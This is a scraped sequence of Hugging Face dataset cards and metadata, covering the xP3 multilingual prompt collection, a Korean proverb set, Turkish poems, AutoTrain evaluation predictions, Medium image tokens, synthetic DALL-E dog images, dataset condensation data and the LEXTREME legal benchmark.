+ TyDI QA
- Primary
- Goldp
* Multiple-Choice QA
+ ARC
+ C3
+ CoS-E
+ Cosmos
+ DREAM
+ MultiRC
+ OpenBookQA
+ PiQA
+ QUAIL
+ QuaRel
+ QuaRTz
+ QASC
+ RACE
+ SciQ
+ Social IQA
+ Wiki Hop
+ WiQA
* Paraphrase Identification
+ MRPC
+ PAWS
+ PAWS-X
+ QQP
* Program Synthesis
+ APPS
+ CodeContests
+ JupyterCodePairs
+ MBPP
+ NeuralCodeSearch
+ XLCoST
* Structure-to-text
+ Common Gen
+ Wiki Bio
* Sentiment
+ Amazon
+ App Reviews
+ IMDB
+ Rotten Tomatoes
+ Yelp
* Simplification
+ BiSECT
* Summarization
+ CNN Daily Mail
+ Gigaword
+ MultiNews
+ SamSum
+ Wiki-Lingua
+ XLSum
+ XSum
* Topic Classification
+ AG News
+ DBPedia
+ TNEWS
+ TREC
+ CSL
* Translation
+ Flores-200
+ Tatoeba
* Word Sense disambiguation
+ WiC
+ XL-WiC
#### Evaluation datasets (included in xP3all except for HumanEval)
* Natural Language Inference
+ ANLI
+ CB
+ RTE
+ XNLI
* Coreference Resolution
+ Winogrande
+ XWinograd
* Program Synthesis
+ HumanEval
* Sentence Completion
+ COPA
+ Story Cloze
+ XCOPA
+ XStoryCloze
#### Additional xP3all datasets
* Coreference Resolution
+ WSC (Fixed)
* Sentence Completion
+ HellaSwag
* Translation
+ MultiEurlex
Additional Information
----------------------
### Licensing Information
The dataset is released under Apache 2.0.
### Contributions
Thanks to the contributors of promptsource for adding many prompts used in this dataset.
| [
"### Dataset Summary\n\n\n\n> \n> xP3 (Crosslingual Public Pool of Prompts) is a collection of prompts & datasets across 46 of languages & 16 NLP tasks. It is used for the training of BLOOMZ and mT0, multilingual language models capable of following human instructions in dozens of languages zero-shot.\n> \n> \n> \n\n\n* Creation: The dataset can be recreated using instructions available here. We provide this version to save processing time and ease reproducibility.\n* Languages: 46 (Can be extended by recreating with more splits)\n* xP3 Dataset Family:\n\n\n\nDataset Structure\n-----------------",
"### Data Instances\n\n\nAn example of \"train\" looks as follows:",
"### Data Fields\n\n\nThe data fields are the same among all splits:\n\n\n* 'inputs': the natural language input fed to the model\n* 'targets': the natural language target that the model has to generate",
"### Data Splits\n\n\nThe below table summarizes sizes per language (computed from the 'merged\\_{lang}.jsonl' files). Due to languages like 'tw' only being single sentence translation samples from Flores, their byte percentage is significantly lower than their sample percentage.\n\n\n\nDataset Creation\n----------------",
"### Source Data",
"#### Training datasets\n\n\n* Code Miscellaneous\n\t+ CodeComplex\n\t+ Docstring Corpus\n\t+ GreatCode\n\t+ State Changes\n* Closed-book QA\n\t+ Hotpot QA\n\t+ Trivia QA\n\t+ Web Questions\n\t+ Wiki QA\n* Extractive QA\n\t+ Adversarial QA\n\t+ CMRC2018\n\t+ DRCD\n\t+ DuoRC\n\t+ MLQA\n\t+ Quoref\n\t+ ReCoRD\n\t+ ROPES\n\t+ SQuAD v2\n\t+ xQuAD\n\t+ TyDI QA\n\t\t- Primary\n\t\t- Goldp\n* Multiple-Choice QA\n\t+ ARC\n\t+ C3\n\t+ CoS-E\n\t+ Cosmos\n\t+ DREAM\n\t+ MultiRC\n\t+ OpenBookQA\n\t+ PiQA\n\t+ QUAIL\n\t+ QuaRel\n\t+ QuaRTz\n\t+ QASC\n\t+ RACE\n\t+ SciQ\n\t+ Social IQA\n\t+ Wiki Hop\n\t+ WiQA\n* Paraphrase Identification\n\t+ MRPC\n\t+ PAWS\n\t+ PAWS-X\n\t+ QQP\n* Program Synthesis\n\t+ APPS\n\t+ CodeContests\n\t+ JupyterCodePairs\n\t+ MBPP\n\t+ NeuralCodeSearch\n\t+ XLCoST\n* Structure-to-text\n\t+ Common Gen\n\t+ Wiki Bio\n* Sentiment\n\t+ Amazon\n\t+ App Reviews\n\t+ IMDB\n\t+ Rotten Tomatoes\n\t+ Yelp\n* Simplification\n\t+ BiSECT\n* Summarization\n\t+ CNN Daily Mail\n\t+ Gigaword\n\t+ MultiNews\n\t+ SamSum\n\t+ Wiki-Lingua\n\t+ XLSum\n\t+ XSum\n* Topic Classification\n\t+ AG News\n\t+ DBPedia\n\t+ TNEWS\n\t+ TREC\n\t+ CSL\n* Translation\n\t+ Flores-200\n\t+ Tatoeba\n* Word Sense disambiguation\n\t+ WiC\n\t+ XL-WiC",
"#### Evaluation datasets (included in xP3all except for HumanEval)\n\n\n* Natural Language Inference\n\t+ ANLI\n\t+ CB\n\t+ RTE\n\t+ XNLI\n* Coreference Resolution\n\t+ Winogrande\n\t+ XWinograd\n* Program Synthesis\n\t+ HumanEval\n* Sentence Completion\n\t+ COPA\n\t+ Story Cloze\n\t+ XCOPA\n\t+ XStoryCloze",
"#### Additional xP3all datasets\n\n\n* Coreference Resolution\n\t+ WSC (Fixed)\n* Sentence Completion\n\t+ HellaSwag\n* Translation\n\t+ MultiEurlex\n\n\nAdditional Information\n----------------------",
"### Licensing Information\n\n\nThe dataset is released under Apache 2.0.",
"### Contributions\n\n\nThanks to the contributors of promptsource for adding many prompts used in this dataset."
] | [
"TAGS\n#task_categories-other #annotations_creators-expert-generated #annotations_creators-crowdsourced #multilinguality-multilingual #size_categories-100M<n<1B #language-Akan #language-Arabic #language-Assamese #language-Bambara #language-Bengali #language-Catalan #language-code #language-English #language-Spanish #language-Basque #language-Fon #language-French #language-Gujarati #language-Hindi #language-Indonesian #language-Igbo #language-Kikuyu #language-Kannada #language-Ganda #language-Lingala #language-Malayalam #language-Marathi #language-Nepali (macrolanguage) #language-Pedi #language-Nyanja #language-Oriya (macrolanguage) #language-Panjabi #language-Portuguese #language-Rundi #language-Kinyarwanda #language-Shona #language-Southern Sotho #language-Swahili (macrolanguage) #language-Tamil #language-Telugu #language-Tswana #language-Tsonga #language-Tumbuka #language-Twi #language-Urdu #language-Vietnamese #language-Wolof #language-Xhosa #language-Yoruba #language-Chinese #language-Zulu #license-apache-2.0 #arxiv-2211.01786 #region-us \n",
"### Dataset Summary\n\n\n\n> \n> xP3 (Crosslingual Public Pool of Prompts) is a collection of prompts & datasets across 46 of languages & 16 NLP tasks. It is used for the training of BLOOMZ and mT0, multilingual language models capable of following human instructions in dozens of languages zero-shot.\n> \n> \n> \n\n\n* Creation: The dataset can be recreated using instructions available here. We provide this version to save processing time and ease reproducibility.\n* Languages: 46 (Can be extended by recreating with more splits)\n* xP3 Dataset Family:\n\n\n\nDataset Structure\n-----------------",
"### Data Instances\n\n\nAn example of \"train\" looks as follows:",
"### Data Fields\n\n\nThe data fields are the same among all splits:\n\n\n* 'inputs': the natural language input fed to the model\n* 'targets': the natural language target that the model has to generate",
"### Data Splits\n\n\nThe below table summarizes sizes per language (computed from the 'merged\\_{lang}.jsonl' files). Due to languages like 'tw' only being single sentence translation samples from Flores, their byte percentage is significantly lower than their sample percentage.\n\n\n\nDataset Creation\n----------------",
"### Source Data",
"#### Training datasets\n\n\n* Code Miscellaneous\n\t+ CodeComplex\n\t+ Docstring Corpus\n\t+ GreatCode\n\t+ State Changes\n* Closed-book QA\n\t+ Hotpot QA\n\t+ Trivia QA\n\t+ Web Questions\n\t+ Wiki QA\n* Extractive QA\n\t+ Adversarial QA\n\t+ CMRC2018\n\t+ DRCD\n\t+ DuoRC\n\t+ MLQA\n\t+ Quoref\n\t+ ReCoRD\n\t+ ROPES\n\t+ SQuAD v2\n\t+ xQuAD\n\t+ TyDI QA\n\t\t- Primary\n\t\t- Goldp\n* Multiple-Choice QA\n\t+ ARC\n\t+ C3\n\t+ CoS-E\n\t+ Cosmos\n\t+ DREAM\n\t+ MultiRC\n\t+ OpenBookQA\n\t+ PiQA\n\t+ QUAIL\n\t+ QuaRel\n\t+ QuaRTz\n\t+ QASC\n\t+ RACE\n\t+ SciQ\n\t+ Social IQA\n\t+ Wiki Hop\n\t+ WiQA\n* Paraphrase Identification\n\t+ MRPC\n\t+ PAWS\n\t+ PAWS-X\n\t+ QQP\n* Program Synthesis\n\t+ APPS\n\t+ CodeContests\n\t+ JupyterCodePairs\n\t+ MBPP\n\t+ NeuralCodeSearch\n\t+ XLCoST\n* Structure-to-text\n\t+ Common Gen\n\t+ Wiki Bio\n* Sentiment\n\t+ Amazon\n\t+ App Reviews\n\t+ IMDB\n\t+ Rotten Tomatoes\n\t+ Yelp\n* Simplification\n\t+ BiSECT\n* Summarization\n\t+ CNN Daily Mail\n\t+ Gigaword\n\t+ MultiNews\n\t+ SamSum\n\t+ Wiki-Lingua\n\t+ XLSum\n\t+ XSum\n* Topic Classification\n\t+ AG News\n\t+ DBPedia\n\t+ TNEWS\n\t+ TREC\n\t+ CSL\n* Translation\n\t+ Flores-200\n\t+ Tatoeba\n* Word Sense disambiguation\n\t+ WiC\n\t+ XL-WiC",
"#### Evaluation datasets (included in xP3all except for HumanEval)\n\n\n* Natural Language Inference\n\t+ ANLI\n\t+ CB\n\t+ RTE\n\t+ XNLI\n* Coreference Resolution\n\t+ Winogrande\n\t+ XWinograd\n* Program Synthesis\n\t+ HumanEval\n* Sentence Completion\n\t+ COPA\n\t+ Story Cloze\n\t+ XCOPA\n\t+ XStoryCloze",
"#### Additional xP3all datasets\n\n\n* Coreference Resolution\n\t+ WSC (Fixed)\n* Sentence Completion\n\t+ HellaSwag\n* Translation\n\t+ MultiEurlex\n\n\nAdditional Information\n----------------------",
"### Licensing Information\n\n\nThe dataset is released under Apache 2.0.",
"### Contributions\n\n\nThanks to the contributors of promptsource for adding many prompts used in this dataset."
] |
5aa6d7d0c90976162beb9e98f11df3bdae500118 | # 한국어 속담 모음 v1.0
국립국어원 우리말샘의 속담을 정제해 만든 데이터입니다.
- 현대에 맞지 않는 단어가 포함된 속담 삭제
- 괄호로 표현된 변형 삭제
- 중복내용 통합
## 원본 데이터 받기
우리말샘에서 속담의 해설을 포함한 원본데이터를 다운받을 수 있습니다.
> 국립국어원 누리집 사전에 실려 있는 속담을 '자세히 찾기' 기능을 활용하여 보실 수 있습니다. 속담이 더 많이 실려 있는 사전-우리말샘의 '자세히 찾기'로 들어가셔서 '속담'을 선택하시면 사전에 실려 있는 모든 속담의 목록이 나옵니다.
https://opendict.korean.go.kr/
우리말샘의 서비스 이용 약관에 따르면
- ‘크리에이티브 커먼즈 저작자 표시-동일조건변경허락2.0 대한민국 라이선스’를 적용합니다.
- 상업적 용도까지 포함하여 누구나 자유롭게 이용할 수 있으며 저작자의 특별한 허가가 필요하지 않습니다.
- 저작물을 이용하기 위해서는 다음의 조건을 지켜야 합니다.
1. 저작자 표시: 자료를 사용할 때 저작자를 필수로 표시해야 합니다.
2. 동일조건변경허락: 자료를 변경하여 새로운 저작물을 만들 때, 그 저작물도 동일한 라이선스로 배포해야 합니다. | mansiksohn/opendict-korean-proverb | [
"task_categories:text-generation",
"task_ids:language-modeling",
"annotations_creators:no-annotation",
"language_creators:found",
"multilinguality:monolingual",
"size_categories:n<1K",
"source_datasets:original",
"language:ko",
"license:cc-by-2.0",
"korean",
"proverb",
"region:us"
] | 2022-07-31T02:05:28+00:00 | {"annotations_creators": ["no-annotation"], "language_creators": ["found"], "language": ["ko"], "license": ["cc-by-2.0"], "multilinguality": ["monolingual"], "size_categories": ["n<1K"], "source_datasets": ["original"], "task_categories": ["text-generation"], "task_ids": ["language-modeling"], "pretty_name": "\ud55c\uad6d\uc5b4 \uc18d\ub2f4 \ubaa8\uc74c v1.0", "tags": ["korean", "proverb"]} | 2022-07-31T02:23:30+00:00 | [] | [
"ko"
] | TAGS
#task_categories-text-generation #task_ids-language-modeling #annotations_creators-no-annotation #language_creators-found #multilinguality-monolingual #size_categories-n<1K #source_datasets-original #language-Korean #license-cc-by-2.0 #korean #proverb #region-us
| # 한국어 속담 모음 v1.0
국립국어원 우리말샘의 속담을 정제해 만든 데이터입니다.
- 현대에 맞지 않는 단어가 포함된 속담 삭제
- 괄호로 표현된 변형 삭제
- 중복내용 통합
## 원본 데이터 받기
우리말샘에서 속담의 해설을 포함한 원본데이터를 다운받을 수 있습니다.
> 국립국어원 누리집 사전에 실려 있는 속담을 '자세히 찾기' 기능을 활용하여 보실 수 있습니다. 속담이 더 많이 실려 있는 사전-우리말샘의 '자세히 찾기'로 들어가셔서 '속담'을 선택하시면 사전에 실려 있는 모든 속담의 목록이 나옵니다.
URL
우리말샘의 서비스 이용 약관에 따르면
- ‘크리에이티브 커먼즈 저작자 표시-동일조건변경허락2.0 대한민국 라이선스’를 적용합니다.
- 상업적 용도까지 포함하여 누구나 자유롭게 이용할 수 있으며 저작자의 특별한 허가가 필요하지 않습니다.
- 저작물을 이용하기 위해서는 다음의 조건을 지켜야 합니다.
1. 저작자 표시: 자료를 사용할 때 저작자를 필수로 표시해야 합니다.
2. 동일조건변경허락: 자료를 변경하여 새로운 저작물을 만들 때, 그 저작물도 동일한 라이선스로 배포해야 합니다. | [
"# 한국어 속담 모음 v1.0\n국립국어원 우리말샘의 속담을 정제해 만든 데이터입니다.\n- 현대에 맞지 않는 단어가 포함된 속담 삭제\n- 괄호로 표현된 변형 삭제\n- 중복내용 통합",
"## 원본 데이터 받기\n우리말샘에서 속담의 해설을 포함한 원본데이터를 다운받을 수 있습니다.\n\n> 국립국어원 누리집 사전에 실려 있는 속담을 '자세히 찾기' 기능을 활용하여 보실 수 있습니다. 속담이 더 많이 실려 있는 사전-우리말샘의 '자세히 찾기'로 들어가셔서 '속담'을 선택하시면 사전에 실려 있는 모든 속담의 목록이 나옵니다.\nURL\n\n우리말샘의 서비스 이용 약관에 따르면\n\n- ‘크리에이티브 커먼즈 저작자 표시-동일조건변경허락2.0 대한민국 라이선스’를 적용합니다.\n- 상업적 용도까지 포함하여 누구나 자유롭게 이용할 수 있으며 저작자의 특별한 허가가 필요하지 않습니다.\n- 저작물을 이용하기 위해서는 다음의 조건을 지켜야 합니다.\n 1. 저작자 표시: 자료를 사용할 때 저작자를 필수로 표시해야 합니다.\n 2. 동일조건변경허락: 자료를 변경하여 새로운 저작물을 만들 때, 그 저작물도 동일한 라이선스로 배포해야 합니다."
] | [
"TAGS\n#task_categories-text-generation #task_ids-language-modeling #annotations_creators-no-annotation #language_creators-found #multilinguality-monolingual #size_categories-n<1K #source_datasets-original #language-Korean #license-cc-by-2.0 #korean #proverb #region-us \n",
"# 한국어 속담 모음 v1.0\n국립국어원 우리말샘의 속담을 정제해 만든 데이터입니다.\n- 현대에 맞지 않는 단어가 포함된 속담 삭제\n- 괄호로 표현된 변형 삭제\n- 중복내용 통합",
"## 원본 데이터 받기\n우리말샘에서 속담의 해설을 포함한 원본데이터를 다운받을 수 있습니다.\n\n> 국립국어원 누리집 사전에 실려 있는 속담을 '자세히 찾기' 기능을 활용하여 보실 수 있습니다. 속담이 더 많이 실려 있는 사전-우리말샘의 '자세히 찾기'로 들어가셔서 '속담'을 선택하시면 사전에 실려 있는 모든 속담의 목록이 나옵니다.\nURL\n\n우리말샘의 서비스 이용 약관에 따르면\n\n- ‘크리에이티브 커먼즈 저작자 표시-동일조건변경허락2.0 대한민국 라이선스’를 적용합니다.\n- 상업적 용도까지 포함하여 누구나 자유롭게 이용할 수 있으며 저작자의 특별한 허가가 필요하지 않습니다.\n- 저작물을 이용하기 위해서는 다음의 조건을 지켜야 합니다.\n 1. 저작자 표시: 자료를 사용할 때 저작자를 필수로 표시해야 합니다.\n 2. 동일조건변경허락: 자료를 변경하여 새로운 저작물을 만들 때, 그 저작물도 동일한 라이선스로 배포해야 합니다."
] |
9ad3dd427c226e588642000394eae8a394c4c845 | Turkish poems scraped from antoloji.com. Features consists of id, poet name, poem rating and the poem.
| okg/turkish-poems | [
"task_categories:text-generation",
"task_categories:text-classification",
"task_ids:language-modeling",
"task_ids:text-scoring",
"annotations_creators:found",
"language_creators:found",
"multilinguality:monolingual",
"size_categories:1K<n<10K",
"language:tr",
"license:unknown",
"region:us"
] | 2022-07-31T09:09:54+00:00 | {"annotations_creators": ["found"], "language_creators": ["found"], "language": ["tr"], "license": ["unknown"], "multilinguality": ["monolingual"], "size_categories": ["1K<n<10K"], "source_datasets": [], "task_categories": ["text-generation", "text-classification"], "task_ids": ["language-modeling", "text-scoring"], "pretty_name": "turkish-poems", "tags": []} | 2022-07-31T09:22:53+00:00 | [] | [
"tr"
] | TAGS
#task_categories-text-generation #task_categories-text-classification #task_ids-language-modeling #task_ids-text-scoring #annotations_creators-found #language_creators-found #multilinguality-monolingual #size_categories-1K<n<10K #language-Turkish #license-unknown #region-us
| Turkish poems scraped from URL. Features consists of id, poet name, poem rating and the poem.
| [] | [
"TAGS\n#task_categories-text-generation #task_categories-text-classification #task_ids-language-modeling #task_ids-text-scoring #annotations_creators-found #language_creators-found #multilinguality-monolingual #size_categories-1K<n<10K #language-Turkish #license-unknown #region-us \n"
] |
4c51ddbf5fdb05d80db8466d2a7eb9253e240dcf | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Summarization
* Model: pszemraj/long-t5-tglobal-base-16384-booksum-V11-big_patent-V2
* Dataset: kmfoda/booksum
* Config: kmfoda--booksum
* Split: test
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@pszemraj](https://huggingface.co/pszemraj) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-kmfoda__booksum-a84cddd6-12085614 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-31T11:46:17+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["kmfoda/booksum"], "eval_info": {"task": "summarization", "model": "pszemraj/long-t5-tglobal-base-16384-booksum-V11-big_patent-V2", "metrics": [], "dataset_name": "kmfoda/booksum", "dataset_config": "kmfoda--booksum", "dataset_split": "test", "col_mapping": {"text": "chapter", "target": "summary_text"}}} | 2022-07-31T13:34:01+00:00 | [] | [] | TAGS
#autotrain #evaluation #region-us
| # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by AutoTrain for the following task and dataset:
* Task: Summarization
* Model: pszemraj/long-t5-tglobal-base-16384-booksum-V11-big_patent-V2
* Dataset: kmfoda/booksum
* Config: kmfoda--booksum
* Split: test
To run new evaluation jobs, visit Hugging Face's automatic model evaluator.
## Contributions
Thanks to @pszemraj for evaluating this model. | [
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Summarization\n* Model: pszemraj/long-t5-tglobal-base-16384-booksum-V11-big_patent-V2\n* Dataset: kmfoda/booksum\n* Config: kmfoda--booksum\n* Split: test\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @pszemraj for evaluating this model."
] | [
"TAGS\n#autotrain #evaluation #region-us \n",
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Summarization\n* Model: pszemraj/long-t5-tglobal-base-16384-booksum-V11-big_patent-V2\n* Dataset: kmfoda/booksum\n* Config: kmfoda--booksum\n* Split: test\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @pszemraj for evaluating this model."
] |
053020686dfa791746f5f3f463e4bc2875ba5ab2 | This dataset contains `<title, encoded_image>` pairs from [Medium](https://medium.com) articles. It was processed from the [Medium Articles Dataset (128k): Metadata + Images](https://www.kaggle.com/datasets/succinctlyai/medium-data) dataset on Kaggle.
The original images were processed in the following way:
1. Given an image of size `(w, h)`, we cropped a square of size `(n, n)` from the center of the image, where `n = min(w, h)`.
2. The resulting `(n, n)` image was resized to `(256, 256)`.
3. The resulting `(256, 256)` image was encoded into image tokens via the [dalle-mini/vqgan\_imagenet\_f16\_16384](https://huggingface.co/dalle-mini/vqgan_imagenet_f16_16384) model.
Note that this dataset contains ~128k entries and is too small for training a text-to-image model end to end; it is more suitable for operations on a pre-trained model
like [dalle-mini](https://huggingface.co/dalle-mini/dalle-mini) (fine-tuning, [prompt tuning](https://arxiv.org/pdf/2104.08691.pdf), etc.). | succinctly/medium-titles-and-images | [
"license:apache-2.0",
"arxiv:2104.08691",
"region:us"
] | 2022-07-31T16:24:50+00:00 | {"license": "apache-2.0"} | 2022-07-31T16:44:16+00:00 | [
"2104.08691"
] | [] | TAGS
#license-apache-2.0 #arxiv-2104.08691 #region-us
| This dataset contains '<title, encoded_image>' pairs from Medium articles. It was processed from the Medium Articles Dataset (128k): Metadata + Images dataset on Kaggle.
The original images were processed in the following way:
1. Given an image of size '(w, h)', we cropped a square of size '(n, n)' from the center of the image, where 'n = min(w, h)'.
2. The resulting '(n, n)' image was resized to '(256, 256)'.
3. The resulting '(256, 256)' image was encoded into image tokens via the dalle-mini/vqgan\_imagenet\_f16\_16384 model.
Note that this dataset contains ~128k entries and is too small for training a text-to-image model end to end; it is more suitable for operations on a pre-trained model
like dalle-mini (fine-tuning, prompt tuning, etc.). | [] | [
"TAGS\n#license-apache-2.0 #arxiv-2104.08691 #region-us \n"
] |
ba1ab3571cae2263de50e79e0325852a4208ff53 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Summarization
* Model: pszemraj/long-t5-tglobal-large-pubmed-3k-booksum-16384-WIP9
* Dataset: samsum
* Config: samsum
* Split: test
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@pszemraj](https://huggingface.co/pszemraj) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-samsum-0c52930e-12115616 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-31T23:21:47+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["samsum"], "eval_info": {"task": "summarization", "model": "pszemraj/long-t5-tglobal-large-pubmed-3k-booksum-16384-WIP9", "metrics": [], "dataset_name": "samsum", "dataset_config": "samsum", "dataset_split": "test", "col_mapping": {"text": "dialogue", "target": "summary"}}} | 2022-07-31T23:59:32+00:00 | [] | [] | TAGS
#autotrain #evaluation #region-us
| # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by AutoTrain for the following task and dataset:
* Task: Summarization
* Model: pszemraj/long-t5-tglobal-large-pubmed-3k-booksum-16384-WIP9
* Dataset: samsum
* Config: samsum
* Split: test
To run new evaluation jobs, visit Hugging Face's automatic model evaluator.
## Contributions
Thanks to @pszemraj for evaluating this model. | [
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Summarization\n* Model: pszemraj/long-t5-tglobal-large-pubmed-3k-booksum-16384-WIP9\n* Dataset: samsum\n* Config: samsum\n* Split: test\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @pszemraj for evaluating this model."
] | [
"TAGS\n#autotrain #evaluation #region-us \n",
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Summarization\n* Model: pszemraj/long-t5-tglobal-large-pubmed-3k-booksum-16384-WIP9\n* Dataset: samsum\n* Config: samsum\n* Split: test\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @pszemraj for evaluating this model."
] |
96ef0d44f0763412ece4a22244a7dbb75aa4e316 |
DALL-E-Dogs is a dataset meant to produce a synthetic animal dataset. This is a precursor to DALL-E-Cats. DALL-E-Dogs and DALL-E-Cats will be fed into an image classifier to see how it performs. This is under the [BirdL-AirL License.](https://huggingface.co/spaces/BirdL/license/) | BirdL/DALL-E-Dogs | [
"task_categories:image-classification",
"task_categories:unconditional-image-generation",
"size_categories:1K<n<10K",
"license:other",
"region:us"
] | 2022-08-01T02:24:18+00:00 | {"annotations_creators": [], "language_creators": [], "language": [], "license": ["other"], "multilinguality": [], "size_categories": ["1K<n<10K"], "source_datasets": [], "task_categories": ["image-classification", "unconditional-image-generation"], "task_ids": [], "pretty_name": "DALL-E Cats Dataset", "tags": []} | 2022-09-28T20:09:11+00:00 | [] | [] | TAGS
#task_categories-image-classification #task_categories-unconditional-image-generation #size_categories-1K<n<10K #license-other #region-us
|
DALL-E-Dogs is a dataset meant to produce a synthetic animal dataset. This is a precursor to DALL-E-Cats. DALL-E-Dogs and DALL-E-Cats will be fed into an image classifier to see how it performs. This is under the BirdL-AirL License. | [] | [
"TAGS\n#task_categories-image-classification #task_categories-unconditional-image-generation #size_categories-1K<n<10K #license-other #region-us \n"
] |
773323193e80d60a61ee816e58e24b7564bbb98c |
### Data summary
- This repository contains small synthetic data for Image datasets; MNIST, SVHN, and CIFAR-10.
- Each torch file contains the images and corresponding labels of sizes ranging from 1,10,50 images per class (IPC).
- For more details, please refer to our GitHub page and paper below.
### Reference
https://github.com/snu-mllab/Efficient-Dataset-Condensation
### Citation
```
@inproceedings{kimICML22,
title = {Dataset Condensation via Efficient Synthetic-Data Parameterization},
author = {Kim, Jang-Hyun and Kim, Jinuk and Oh, Seong Joon and Yun, Sangdoo and Song, Hwanjun and Jeong, Joonhyun and Ha, Jung-Woo and Song, Hyun Oh},
booktitle = {International Conference on Machine Learning (ICML)},
year = {2022}
}
``` | ICML2022/EfficientDatasetCondensation | [
"license:mit",
"region:us"
] | 2022-08-01T05:53:31+00:00 | {"license": "mit", "data_type": "image (0-1 ranged float)"} | 2022-08-01T06:12:52+00:00 | [] | [] | TAGS
#license-mit #region-us
|
### Data summary
- This repository contains small synthetic data for Image datasets; MNIST, SVHN, and CIFAR-10.
- Each torch file contains the images and corresponding labels of sizes ranging from 1,10,50 images per class (IPC).
- For more details, please refer to our GitHub page and paper below.
### Reference
URL
| [
"### Data summary\n- This repository contains small synthetic data for Image datasets; MNIST, SVHN, and CIFAR-10.\n- Each torch file contains the images and corresponding labels of sizes ranging from 1,10,50 images per class (IPC). \n- For more details, please refer to our GitHub page and paper below.",
"### Reference\nURL"
] | [
"TAGS\n#license-mit #region-us \n",
"### Data summary\n- This repository contains small synthetic data for Image datasets; MNIST, SVHN, and CIFAR-10.\n- Each torch file contains the images and corresponding labels of sizes ranging from 1,10,50 images per class (IPC). \n- For more details, please refer to our GitHub page and paper below.",
"### Reference\nURL"
] |
8de79b42002a6e7ab7e713787f4c427d122a269f |
# Dataset Card for LEXTREME: A Multilingual Legal Benchmark for Natural Language Understanding
## Table of Contents
- [Table of Contents](#table-of-contents)
- [Dataset Description](#dataset-description)
- [Dataset Summary](#dataset-summary)
- [Supported Tasks and Leaderboards](#supported-tasks-and-leaderboards)
- [Languages](#languages)
- [Dataset Structure](#dataset-structure)
- [Data Instances](#data-instances)
- [Data Fields](#data-fields)
- [Data Splits](#data-splits)
- [Dataset Creation](#dataset-creation)
- [Curation Rationale](#curation-rationale)
- [Source Data](#source-data)
- [Annotations](#annotations)
- [Personal and Sensitive Information](#personal-and-sensitive-information)
- [Considerations for Using the Data](#considerations-for-using-the-data)
- [Social Impact of Dataset](#social-impact-of-dataset)
- [Discussion of Biases](#discussion-of-biases)
- [Other Known Limitations](#other-known-limitations)
- [Additional Information](#additional-information)
- [Dataset Curators](#dataset-curators)
- [Licensing Information](#licensing-information)
- [Citation Information](#citation-information)
- [Contributions](#contributions)
## Dataset Description
- **Homepage:**
- **Repository:**
- **Paper:**
- **Leaderboard:**
- **Point of Contact:** [Joel Niklaus](mailto:[email protected])
### Dataset Summary
The dataset consists of 11 diverse multilingual legal NLU datasets. 6 datasets have one single configuration and 5 datasets have two or three configurations. This leads to a total of 18 tasks (8 single-label text classification tasks, 5 multi-label text classification tasks and 5 token-classification tasks).
Use the dataset like this:
```python
from datasets import load_dataset
dataset = load_dataset("joelito/lextreme", "swiss_judgment_prediction")
```
### Supported Tasks and Leaderboards
The dataset supports the tasks of text classification and token classification.
In detail, we support the folliwing tasks and configurations:
| task | task type | configurations | link |
|:---------------------------|--------------------------:|---------------------------------:|-------------------------------------------------------------------------------------------------------:|
| Brazilian Court Decisions | Judgment Prediction | (judgment, unanimity) | [joelito/brazilian_court_decisions](https://huggingface.co/datasets/joelito/brazilian_court_decisions) |
| Swiss Judgment Prediction | Judgment Prediction | default | [joelito/swiss_judgment_prediction](https://huggingface.co/datasets/swiss_judgment_prediction) |
| German Argument Mining | Argument Mining | default | [joelito/german_argument_mining](https://huggingface.co/datasets/joelito/german_argument_mining) |
| Greek Legal Code | Topic Classification | (volume, chapter, subject) | [greek_legal_code](https://huggingface.co/datasets/greek_legal_code) |
| Online Terms of Service | Unfairness Classification | (unfairness level, clause topic) | [online_terms_of_service](https://huggingface.co/datasets/joelito/online_terms_of_service) |
| Covid 19 Emergency Event | Event Classification | default | [covid19_emergency_event](https://huggingface.co/datasets/joelito/covid19_emergency_event) |
| MultiEURLEX | Topic Classification | (level 1, level 2, level 3) | [multi_eurlex](https://huggingface.co/datasets/multi_eurlex) |
| LeNER BR | Named Entity Recognition | default | [lener_br](https://huggingface.co/datasets/lener_br) |
| LegalNERo | Named Entity Recognition | default | [legalnero](https://huggingface.co/datasets/joelito/legalnero) |
| Greek Legal NER | Named Entity Recognition | default | [greek_legal_ner](https://huggingface.co/datasets/joelito/greek_legal_ner) |
| MAPA | Named Entity Recognition | (coarse, fine) | [mapa](https://huggingface.co/datasets/joelito/mapa) |
### Languages
